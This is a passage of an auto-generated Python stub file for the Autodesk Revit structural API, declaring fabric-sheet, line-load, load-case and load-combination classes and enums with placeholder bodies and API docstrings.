OverallWidth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of the wire sheet (including overhangs) in the minor direction. Get: OverallWidth(self: FabricSheetType) -> float """ SheetMass = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass. Get: SheetMass(self: FabricSheetType) -> float Set: SheetMass(self: FabricSheetType) = value """ SheetMassUnit = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass per area unit. Get: SheetMassUnit(self: FabricSheetType) -> float """ class FabricTagComponentReference(Enum, IComparable, IFormattable, IConvertible): """ How FabricSheet tag text will be aligned to the FabricSheet symbol. enum FabricTagComponentReference, values: Diagonal (2), Intersection (3), MajorAxis (0), MinorAxis (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Diagonal = None Intersection = None MajorAxis = None MinorAxis = None value__ = None class FabricWireItem(object, IDisposable): """ Provides implementation for FabricWires stored in a Custom Fabric Sheet """ @staticmethod def Create(distance, wireLength, wireType): """ Create(distance: float, wireLength: float, wireType: ElementId) -> FabricWireItem Creates a new instance of a single Fabric wire. distance: The distance between this wire and the next wire in the Custom Fabric Sheet wireLength: Length of this wire wireType: The wire type of this wire Returns: The newly created Fabric wire instance. """ pass def Dispose(self): """ Dispose(self: FabricWireItem) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: FabricWireItem, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Distance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Distance to the next fabric wire item Get: Distance(self: FabricWireItem) -> float Set: Distance(self: FabricWireItem) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: FabricWireItem) -> bool """ WireLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Wire length for this wire item Get: WireLength(self: FabricWireItem) -> float Set: WireLength(self: FabricWireItem) = value """ WireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The wire type of this wire item Get: WireType(self: FabricWireItem) -> ElementId Set: WireType(self: FabricWireItem) = value """ class FabricWireType(ElementType, IDisposable): """ A Fabric Wire Type object that is used in the generation of Fabric Wire. """ @staticmethod def CreateDefaultFabricWireType(ADoc): """ CreateDefaultFabricWireType(ADoc: Document) -> ElementId Creates a new FabricWireType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Determines the bending diameter of the wire. Get: BendDiameter(self: FabricWireType) -> float Set: BendDiameter(self: FabricWireType) = value """ WireDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Determines the diameter of the wire. Get: WireDiameter(self: FabricWireType) -> float Set: WireDiameter(self: FabricWireType) = value """ class FamilyStructuralMaterialTypeFilter(ElementSlowFilter, IDisposable): """ A filter used to match families that have the given structural material type. FamilyStructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType, inverted: bool) FamilyStructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralMaterialType, inverted=None): """ __new__(cls: type, structuralMaterialType: StructuralMaterialType, inverted: bool) __new__(cls: type, structuralMaterialType: StructuralMaterialType) """ pass StructuralMaterialType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The family structural material type. Get: StructuralMaterialType(self: FamilyStructuralMaterialTypeFilter) -> StructuralMaterialType """ class Hub(Element, IDisposable): """ Represents a connection between two or more Autodesk Revit Elements. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHubConnectorManager(self): """ GetHubConnectorManager(self: Hub) -> ConnectorManager Retrieves the ConnectorManager of the Hub. Returns: The ConnectorManager. """ pass def GetOrigin(self): """ GetOrigin(self: Hub) -> XYZ Retrieves position of a Hub if such position is a 3D point. Returns: The origin. """ pass def HasOrigin(self): """ HasOrigin(self: Hub) -> bool Provides information if Hub has a specific location at point in 3D space. Returns: True if the Hub has a specific location at point in 3D space. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class ICodeCheckingParameterServer(IExternalServer): """ Interface for the code checking parameter server to implement. """ def PerformCodeChecking(self, data): """ PerformCodeChecking(self: ICodeCheckingParameterServer, data: CodeCheckingParameterServiceData) -> bool The server's method that will be called when Revit User clicks the Code Checking parameter's button from the properties palette. data: The Code Checking data. Returns: Indicates whether the code checking parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class IMemberForcesServer(IExternalServer): """ Interface for the Member Forces server to implement. """ def MemberForcesUpdate(self, data): """ MemberForcesUpdate(self: IMemberForcesServer, data: MemberForcesServiceData) -> bool The server's method that will be called when Revit User clicks Member Forces button in the MPP. data: The Moment Forces data. Returns: Indicates whether themember forces parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class IStructuralSectionsServer(IExternalServer): """ Interface for the section type parameter server to implement. """ def StructuralSectionsUpdate(self, data): """ StructuralSectionsUpdate(self: IStructuralSectionsServer, data: StructuralSectionsServiceData) -> bool The server's method that will be called when Revit User clicks the Section Type parameter's button in the family dialog. data: The Section Type data. Returns: Indicates whether the section type parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LineLoad(LoadBase, IDisposable): """ An object that represents a force/moment applied in a linear manner. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelStick, forceVector1: XYZ, momentVector1: XYZ, symbol: LineLoadType) -> LineLoad Creates a new hosted line load within the project. aDoc: Document to which new line load will be added. host: The analytical model stick host element for the line Load. forceVector1: The applied 3d force vector. momentVector1: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set ll to use default type. Returns: If successful, returns the newly created LineLoad, ll otherwise. Create(aDoc: Document, host: AnalyticalModelSurface, curveIndex: int, forceVector1: XYZ, momentVector1: XYZ, symbol: LineLoadType) -> LineLoad Creates a new hosted line load within the project. aDoc: Document to which new line load will be added. host: The analytical model surface host element for the line Load. curveIndex: The index of a curve in analytical surface element starting from 0. Use Autodesk::Revit::DB::Structure::AnalyticalModelSurface::GetLoops(Autodesk::Revit ::DB::Structure::AnalyticalLoopType::All) method to obtain appropriate curve index. Curve index has a unique value in analytical surface element even if it contains more than one loop. The index should be obtain by iteration through all curves in all loops. forceVector1: The applied 3d force vector. momentVector1: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set ll to use default type. Returns: If successful, returns the newly created LineLoad, ll otherwise. Create(aDoc: Document, startPoint: XYZ, endPoint: XYZ, forceVector: XYZ, momentVector: XYZ, symbol: LineLoadType, plane: SketchPlane) -> LineLoad Creates a new non-hosted line load within the project using data at point. aDoc: Document to which new line load will be added. startPoint: The start point of line load, measured in decimal feet. endPoint: The end point of line load, measured in decimal feet. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set ll to use default type. plane: The work plane of the LineLoad. Set ll to use default plane. Returns: If successful, returns the newly created LineLoad, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: LineLoad) -> Curve Returns curve that define geometry of the line load. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetPoints(self, startPoint, endPoint): """ SetPoints(self: LineLoad, startPoint: XYZ, endPoint: XYZ) -> bool Sets start and end point of the line load. startPoint: The start point. endPoint: The end point. Returns: Returns true if successful, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass EndPoint = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the three dimensional location of the end point for the line load. Get: EndPoint(self: LineLoad) -> XYZ """ ForceVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the start point of the line load, oriented according to OrientTo setting. Get: ForceVector1(self: LineLoad) -> XYZ Set: ForceVector1(self: LineLoad) = value """ ForceVector2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the end point of the line load, oriented according to OrientTo setting. Get: ForceVector2(self: LineLoad) -> XYZ Set: ForceVector2(self: LineLoad) = value """ IsProjected = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is projected. Get: IsProjected(self: LineLoad) -> bool Set: IsProjected(self: LineLoad) = value """ IsUniform = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is uniform. Get: IsUniform(self: LineLoad) -> bool """ MomentVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the start point of the line load, oriented according to OrientTo setting. Get: MomentVector1(self: LineLoad) -> XYZ Set: MomentVector1(self: LineLoad) = value """ MomentVector2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the end point of the line load, oriented according to OrientTo setting. Get: MomentVector2(self: LineLoad) -> XYZ Set: MomentVector2(self: LineLoad) = value """ StartPoint = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the three dimensional location of the start point for the line load. Get: StartPoint(self: LineLoad) -> XYZ """ class LineLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LoadCase(Element, IDisposable): """ An object that represents a load usage. """ @staticmethod def Create(document, name, natureId, *__args): """ Create(document: Document, name: str, natureId: ElementId, loadCaseCategory: LoadCaseCategory) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. loadCaseCategory: The predefined load case category. Returns: The newly created load case element if successful, ll otherwise. Create(document: Document, name: str, natureId: ElementId, subcategoryId: ElementId) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. subcategoryId: The load case subcategory ID. Could be one of predefined or user defined load case category. Built-in structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) subcategories are: Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesDeadAutodesk.Revit.DB.BuiltInCate gory.OST_LoadCasesLiveAutodesk.Revit.DB.BuiltInCategory.OST_LoadCasesWindAutodes k.Revit.DB.BuiltInCategory.OST_LoadCasesSnowAutodesk.Revit.DB.BuiltInCategory.OS T_LoadCasesRoofLiveAutodesk.Revit.DB.BuiltInCategory.OST_LoadCasesAccidentalAuto desk.Revit.DB.BuiltInCategory.OST_LoadCasesTemperatureAutodesk.Revit.DB.BuiltInC ategory.OST_LoadCasesSeismic Returns: The newly created load case element if successful, ll otherwise. Create(document: Document, name: str, natureId: ElementId, natureCategory: LoadNatureCategory) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. natureCategory: The predefined load nature category. Returns: The newly created load case element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsLoadCaseSubcategoryId(self, loadCaseSubcategoryId): """ IsLoadCaseSubcategoryId(self: LoadCase, loadCaseSubcategoryId: ElementId) -> bool Checks whether provided element ID refer to subcategory of Structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) category - one of built-in or user defined. loadCaseSubcategoryId: The ID to check. Returns: True if the ID refers to load case category element, false otherwise. """ pass def IsLoadNatureId(self, natureId): """ IsLoadNatureId(self: LoadCase, natureId: ElementId) -> bool Checks whether provided element ID refer to LoadNature element. natureId: The ID to check. Returns: True if the ID refers to LoadNature element, false otherwise. """ pass @staticmethod def IsNumberUnique(document, number): """ IsNumberUnique(document: Document, number: int) -> bool Checks that a given number is unique among all load cases. number: The number to check. Returns: True if the given number is unique among all load cases, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass NatureCategory = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The nature category of the load case. Get: NatureCategory(self: LoadCase) -> LoadNatureCategory Set: NatureCategory(self: LoadCase) = value """ NatureId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The nature ID of the load case. Get: NatureId(self: LoadCase) -> ElementId Set: NatureId(self: LoadCase) = value """ Number = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns unique load case number. Get: Number(self: LoadCase) -> int Set: Number(self: LoadCase) = value """ SubcategoryId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Build-in or user defined subcategory of Structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) category. Get: SubcategoryId(self: LoadCase) -> ElementId Set: SubcategoryId(self: LoadCase) = value """ class LoadCaseCategory(Enum, IComparable, IFormattable, IConvertible): """ Specifies load case category. enum LoadCaseCategory, values: Accidental (5), Dead (0), Live (1), RoofLive (4), Seismic (7), Snow (3), Temperature (6), Wind (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Accidental = None Dead = None Live = None RoofLive = None Seismic = None Snow = None Temperature = None value__ = None Wind = None class LoadCombination(Element, IDisposable): """ An object that represents a load combination. """ @staticmethod def Create(document, name, type=None, state=None): """ Create(document: Document, name: str) -> LoadCombination Creates a new default LoadCombination. document: The Document to which new load combination element will be added. name: The name of the load combination. Returns: The newly created load combination element if successful, ll otherwise. Create(document: Document, name: str, type: LoadCombinationType, state: LoadCombinationState) -> LoadCombination Creates a new LoadCombination. document: The Document to which new load combination element will be added. name: The name of the load combination. type: The type of the load combination. state: The state of the load combination. Returns: The newly created load combination element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCaseAndCombinationIds(self): """ GetCaseAndCombinationIds(self: LoadCombination) -> IList[ElementId] Returns collection of the load combination case and combination IDs. Returns: A collection of the load combination case and combination IDs. """ pass def GetComponents(self): """ GetComponents(self: LoadCombination) -> IList[LoadComponent] Returns collection of the load combination components. Returns: A collection of the load combination components. """ pass def GetUsageIds(self): """ GetUsageIds(self: LoadCombination) -> IList[ElementId] Returns collection of the load combination usage IDs. Returns: A collection of the load combination usage IDs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetComponents(self, components): """ SetComponents(self: LoadCombination, components: IList[LoadComponent]) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetUsageIds(self, usageIds): """ SetUsageIds(self: LoadCombination, usageIds: IList[ElementId]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass IsThirdPartyGenerated = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load combination was created by API. Get: IsThirdPartyGenerated(self: LoadCombination) -> bool """ State = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The state of the load combination. Get: State(self: LoadCombination) -> LoadCombinationState Set: State(self: LoadCombination) = value """ Type = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of the load combination. Get: Type(self: LoadCombination) -> LoadCombinationType Set: Type(self: LoadCombination) = value """ class LoadCombinationState(Enum, IComparable, IFormattable, IConvertible): """ Specifies load combination state. enum LoadCombinationState, values: Serviceability (0), Ultimate (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Serviceability = None Ultimate = None value__ = None class LoadCombinationType(Enum, IComparable, IFormattable, IConvertible): """ Specifies load combination type. enum LoadCombinationType, values: Combination (0), Envelope (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Combination = None Envelope = None value__ = None class LoadComponent(object, IDisposable): """ An object that represents a load combination component. LoadComponent(loadCaseOrCombinationId: ElementId, factor: float) """ def Dispose(self): """ Dispose(self: LoadComponent) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: LoadComponent, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, loadCaseOrCombinationId, factor): """ __new__(cls: type, loadCaseOrCombinationId: ElementId, factor: float) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Factor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Load component factor. Get: Factor(self: LoadComponent) -> float Set: Factor(self: LoadComponent) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: LoadComponent) -> bool """ LoadCaseOrCombinationId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Load case or combination id. Get: LoadCaseOrCombinationId(self: LoadComponent) -> ElementId Set: LoadCaseOrCombinationId(self: LoadComponent) = value """ class LoadNature(Element, IDisposable): """ An object that represents a load nature. """ @staticmethod def Create(document, name): """ Create(document: Document, name: str) -> LoadNature Creates a new LoadNature. document: The Document to which new load nature element will be added. name: The name of the load nature. Returns: The newly created load nature element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LoadNatureCategory(Enum, IComparable, IFormattable, IConvertible): """ Specifies load case nature. enum LoadNatureCategory, values: Accidental (5), Dead (0), Live (1), RoofLive (4), Seismic (7), Snow (3), Temperature (6), Wind (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Accidental = None Dead = None Live = None RoofLive = None Seismic = None Snow = None Temperature = None value__ = None Wind = None class LoadOrientTo(Enum, IComparable, IFormattable, IConvertible): """ Specifies load orientation. enum LoadOrientTo, values: HostLocalCoordinateSystem (2), Project (0), WorkPlane (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass HostLocalCoordinateSystem = None Project = None value__ = None WorkPlane = None class LoadType(Enum, IComparable, IFormattable, IConvertible): """ This enum declares types of Loads. enum LoadType, values: Area (2), Line (1), Point (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Line = None Point = None value__ = None class LoadUsage(Element, IDisposable): """ An object that represents a load usage. """ @staticmethod def Create(document, name): """ Create(document: Document, name: str) -> LoadUsage Creates a new LoadUsage. document: The Document to which new load usage element will be added. name: The name of the load usage. Returns: The newly created load usage element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> 